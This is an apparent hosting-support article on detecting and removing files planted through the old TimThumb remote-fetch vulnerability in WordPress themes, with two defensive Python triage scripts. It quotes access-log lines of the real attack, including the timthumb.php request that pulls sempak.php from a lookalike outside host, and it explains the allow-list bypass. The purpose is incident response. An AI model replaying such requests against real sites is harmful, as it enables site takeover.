TimThumb is a PHP script used by many WordPress themes and plugins to resize images. Old versions of TimThumb have a security vulnerability that lets an attacker make the script fetch a file from another website and save it in TimThumb's cache directory: the script only checked that the remote hostname contained a trusted name such as img.youtube.com, so a hostname like img.youtube.com.bargainbookfinders.com passed the check, and the fetched "image" could be PHP code rather than an image. The first malicious ("bad") file, once requested through the web server, then lets the attacker upload more malicious files to the hosting account.
You can get more information about compromises and how to deal with them in My website was hacked. What should I do?.
Besides the signs mentioned in My website was hacked. What should I do?, you can tell your site has been affected by this specific compromise if your account contains files matching the following patterns in a theme or plugin directory:
You can find the MD5 hashes of known bad files in the MD5SUMS of Known Malicious Files section of this article; compare the hashes of any suspicious files against that list.
You might also find the following files in your website's root directory (more info):
You must remove all of the bad files and any legitimate files they modified. Before deleting anything, we recommend making a backup of your website (more info), so that you can recover anything removed by mistake and keep a copy of the evidence.
The bad files that are initially uploaded through the TimThumb vulnerability will typically be located in one of the following directories, inside the theme or plugin directory (under wp-content/themes or wp-content/plugins) that contains the vulnerable TimThumb file.
Examples of bad files' locations:
[webroot]/wp-content/themes/[theme with vulnerable TimThumb]/cache/https://static.itegy.com/images/
Examples of bad files' names in these locations:
The files x.txt and logx.txt contain information about when a bad file was created using the TimThumb vulnerability and the location of that bad file within the hosting account. This information is helpful in determining which files need to be removed and where to find them. However, do not treat it as a complete list: the attacker's later uploads are not necessarily recorded there, so you must still search the whole account.
An example:
After you've created a backup of your site, remove the following files:
You can do this via FTP (more info) or through the file manager within the control panel for your hosting account (more info).
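The following Python script, added here as an example (it is not part of this article and not TimThumb's own code), automates the search described above: it walks a WordPress directory tree, lists every copy of timthumb.php with the version string it declares, lists every PHP file that sits under a cache directory, lists x.txt and logx.txt marker files, and flags any file whose MD5 matches a list you supply (use the hashes from the MD5SUMS of Known Malicious Files section; none are reproduced here). The sample tree it builds is a constructed stand-in with harmless contents, `vulnerable-theme` and `some-plugin` are placeholder names, and the assumption that TimThumb declares its version as `define ('VERSION', '...')` is the script's, not the article's.

```python
import hashlib
import os
import re
import tempfile

# Assumption: TimThumb declares its version near the top of the file as
# define ('VERSION', '...'); this pattern reads it, "unknown" if absent.
VERSION_RE = re.compile(r"""define\s*\(\s*['"]VERSION['"]\s*,\s*['"]([^'"]+)['"]""")
MARKER_NAMES = {"x.txt", "logx.txt"}
PHP_EXTENSIONS = (".php", ".php5", ".phtml")  # extend to match your host's PHP handler


def md5_of(path):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def timthumb_version(path):
    with open(path, "r", errors="replace") as f:
        m = VERSION_RE.search(f.read(8192))
    return m.group(1) if m else "unknown"


def triage_tree(root, known_bad_md5=frozenset()):
    """Walk `root` and collect timthumb copies, PHP files under any cache/ directory,
    marker files, and files whose MD5 is in `known_bad_md5`. Paths are relative to root."""
    result = {"timthumb_copies": [], "cache_php": [], "markers": [], "known_bad": []}
    for dirpath, _dirs, filenames in os.walk(root):
        parts = [p.lower() for p in os.path.relpath(dirpath, root).split(os.sep)]
        for name in filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            lower = name.lower()
            if lower == "timthumb.php":
                result["timthumb_copies"].append((rel, timthumb_version(full)))
            elif "cache" in parts and lower.endswith(PHP_EXTENSIONS):
                # PHP in a cache directory is the signature of the initial drop
                result["cache_php"].append((rel, md5_of(full)))
            elif lower in MARKER_NAMES:
                result["markers"].append(rel)
            if known_bad_md5 and md5_of(full) in known_bad_md5:
                result["known_bad"].append(rel)
    for entries in result.values():
        entries.sort()
    return result


def build_sample_tree(base):
    """Constructed fixture mimicking the layout in the article; contents are harmless stand-ins."""
    theme = os.path.join(base, "wp-content", "themes", "vulnerable-theme")
    plugin = os.path.join(base, "wp-content", "plugins", "some-plugin")
    files = {
        os.path.join(theme, "framework", "timthumb.php"): "<?php\ndefine ('VERSION', '1.09');\n",
        os.path.join(theme, "cache", "896c4eb4ff2581f6e623db1904b80a44.php"):
            "<?php /* constructed stand-in for a dropped file */ echo 'x';\n",
        os.path.join(theme, "cache", "x.txt"): "constructed marker\n",
        os.path.join(theme, "cache", "logx.txt"): "constructed marker\n",
        os.path.join(theme, "cache", "a1b2c3.jpg"): "not php\n",
        os.path.join(theme, "style.css"): "/* theme */\n",
        os.path.join(plugin, "timthumb.php"): "<?php\ndefine ('VERSION', '2.8.14');\n",
    }
    for path, content in files.items():
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(content)


def run_demo():
    """Build the sample tree, treat the dropped file's hash as 'known bad', and triage it."""
    with tempfile.TemporaryDirectory() as base:
        build_sample_tree(base)
        dropped = os.path.join(base, "wp-content", "themes", "vulnerable-theme",
                               "cache", "896c4eb4ff2581f6e623db1904b80a44.php")
        known_bad = {md5_of(dropped)}  # stands in for the article's MD5SUMS list
        return triage_tree(base, known_bad)


if __name__ == "__main__":
    for key, entries in run_demo().items():
        print(key)
        for entry in entries:
            print("   ", entry)
```

To run it against a real account, call `triage_tree("/path/to/public_html", {"<md5>", ...})` with the hashes from the MD5SUMS section; back up and then remove everything under `cache_php` and `known_bad`, and replace every copy reported under `timthumb_copies` with the current release.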
You should also:
Replace TimThumb.php with the newest version, found here.
The following access-log entries show what an attack through this vulnerability looks like (IP addresses, the site name and the theme name are redacted):
x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/https://static.itegy.com/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/https://static.itegy.com/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[theme with vulnerable TimThumb]/cache/https://static.itegy.com/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
Reading the entries in order: the first request calls timthumb.php with a src parameter pointing at img.youtube.com.bargainbookfinders.com, a hostname that contains the trusted name img.youtube.com, so the vulnerable script fetched sempak.php and stored it in its cache directory. One second later the attacker requests the cached copy, now stored under an md5-style name with a .php extension, and the server runs it (status 200). The remaining requests repeat that call and probe for another file (the 404 for wp-includes/wp-script.php). The identical, unusual User-Agent string on every request is a useful search key when you look for further activity from the same attacker in your logs.
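The following Python script, added here as an example (it is not part of this article and not TimThumb's code), runs the two checks a responder would apply to access-log entries like those above: for every request to timthumb.php with a remote src, it runs the src hostname through a substring allow-list check of the kind old TimThumb builds used and through an anchored check that only accepts the trusted domain or a real subdomain of it, so you can see exactly why img.youtube.com.bargainbookfinders.com was accepted; and it collects every successful request for a .php file inside a cache directory, which is the list of cached payloads to back up and delete. The sample log is constructed from the redacted entries above with `vulnerable-theme` standing in for the theme name, plus one benign thumbnail request for contrast; ALLOWED_SITES is an illustrative subset, not TimThumb's real list.

```python
import re
from urllib.parse import parse_qs, urlparse

# Domains old TimThumb builds trusted for remote images.  Illustrative subset
# chosen for this example, not TimThumb's actual list.
ALLOWED_SITES = ("img.youtube.com", "flickr.com", "imgur.com")

# Combined log format: ip ident user [time] "method target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed from the redacted entries in the article: a benign thumbnail
# request, then the allow-list bypass and the calls to the cached payload.
SAMPLE_LOG = """\
x.x.x.x - - [27/Apr/2014:07:55:01 -0700] "GET SampleSite.tld/wp-content/themes/vulnerable-theme/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com%2Fvi%2Fabc123%2F0.jpg&w=120 HTTP/1.1" 200 4310 "-" "Mozilla/5.0"
x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/vulnerable-theme/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/vulnerable-theme/cache/https://static.itegy.com/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/vulnerable-theme/cache/https://static.itegy.com/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/vulnerable-theme/cache/https://static.itegy.com/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
"""


def substring_check(host, allowed=ALLOWED_SITES):
    """The weak check: any host that merely *contains* a trusted name is accepted."""
    host = host.lower()
    return any(site in host for site in allowed)


def anchored_check(host, allowed=ALLOWED_SITES):
    """The correct check: the host must be the trusted name or a subdomain of it."""
    host = host.lower().rstrip(".")
    return any(host == site or host.endswith("." + site) for site in allowed)


def analyze_line(line):
    """Return the findings for one access-log line (empty list if nothing is suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlparse(m.group("target"))  # handles both "/path?q" and "host/path?q" targets
    path = url.path
    base = {"ip": m.group("ip"), "time": m.group("time"),
            "status": int(m.group("status")), "path": path}
    findings = []
    if path.lower().endswith("timthumb.php"):
        for src in parse_qs(url.query).get("src", []):
            host = urlparse(src).hostname  # None for a local path such as /uploads/a.jpg
            if host:
                findings.append(dict(base, kind="remote_src", src=src, host=host,
                                     weak_check_allows=substring_check(host),
                                     anchored_check_allows=anchored_check(host)))
    if "/cache/" in path.lower() and path.lower().endswith(".php"):
        findings.append(dict(base, kind="cache_php_request"))
    return findings


def triage(log_text):
    findings = []
    for line in log_text.splitlines():
        findings.extend(analyze_line(line))
    return findings


def bypass_attempts(findings):
    """Remote src hosts the substring check accepts but the anchored check rejects."""
    return [f for f in findings
            if f["kind"] == "remote_src"
            and f["weak_check_allows"] and not f["anchored_check_allows"]]


def cached_php_to_remove(findings):
    """Cached .php paths that were served with 200: payloads to back up, then delete."""
    return sorted({f["path"] for f in findings
                   if f["kind"] == "cache_php_request" and f["status"] == 200})


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in bypass_attempts(found):
        print(f"{f['time']} {f['ip']} allow-list bypass via src host {f['host']}")
    for p in cached_php_to_remove(found):
        print("remove cached payload:", p)
```

Feed it your real log with `triage(open("access.log").read())`; the benign first entry passes both checks, while the bargainbookfinders.com host passes only the substring check, which is the whole bug.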